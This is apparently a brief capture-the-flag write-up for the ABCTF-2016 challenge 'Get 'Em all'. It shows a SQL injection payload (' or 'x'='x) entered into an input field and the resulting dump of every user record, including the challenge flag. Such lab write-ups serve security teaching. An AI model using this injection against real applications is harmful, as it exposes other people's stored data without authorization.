Home ABCTF-2016 Get ‘Em all
Writeup
Cancel

Get ‘Em all

Challenge I think one of the users data fields holds a flag. If only you could find the username. Link

Solution SQL injection challenge, we enter the following in the input field:

1
' or 'x'='x

and get the following output, which includes the flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii

Flag

ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}